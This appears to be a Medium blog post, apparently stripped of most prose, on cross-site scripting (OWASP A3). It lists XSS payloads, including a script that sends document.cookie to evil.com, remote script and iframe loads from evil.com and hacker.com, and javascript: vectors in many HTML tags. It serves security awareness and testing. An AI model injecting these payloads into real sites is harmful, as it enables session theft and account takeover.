A3 CROSS-SITE SCRIPTING (XSS) — SİTELER ARASI KOMUT DOSYASI OLUŞTURMA

print "<html>"print "<h1>Most recent comment</h1>"print database.latestComment
print "</html>
<html><h1>Most recent comment</h1><script>doSomethingEvil();</script></html>
<script>window.location="http://evil.com/?cookie=" + document.cookie</script>
<!-- External script --><script src=http://evil.com/xss.js></script><!-- Embedded script --><script> alert("XSS"); </script>
<!-- onload attribute in the <body> tag --><body onload=alert("XSS")>
<!-- background attribute --><body background="javascript:alert("XSS")">
<!-- <img> tag XSS --><img src="javascript:alert("XSS");"><!--  tag XSS using lesser-known attributes --><img dynsrc="javascript:alert('XSS')"><img lowsrc="javascript:alert('XSS')">
<!-- <iframe> tag XSS --><iframe src="http://evil.com/xss.html">
<!-- <input> tag XSS --><input type="image" src="javascript:alert('XSS');">
<!-- <link> tag XSS --><link rel="stylesheet" href="javascript:alert('XSS');">
<!-- <table> tag XSS --><table background="javascript:alert('XSS')"><!-- <td> tag XSS --><td background="javascript:alert('XSS')">
<!-- <div> tag XSS --><div style="background-image: url(javascript:alert('XSS'))"><!-- <div> tag XSS --><div style="width: expression(alert('XSS'));">
<!-- <object> tag XSS --><object type="text/x-scriptlet" data="http://hacker.com/xss.html">

Cyber Security Researcher https://twitter.com/Computeus7

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmet PAYASLIOĞLU

Ahmet PAYASLIOĞLU

Cyber Security Researcher https://twitter.com/Computeus7

More from Medium

Less than 5 days until EGEM Halving

Deadstate: Bunker

SSLV Completes its first hot fire test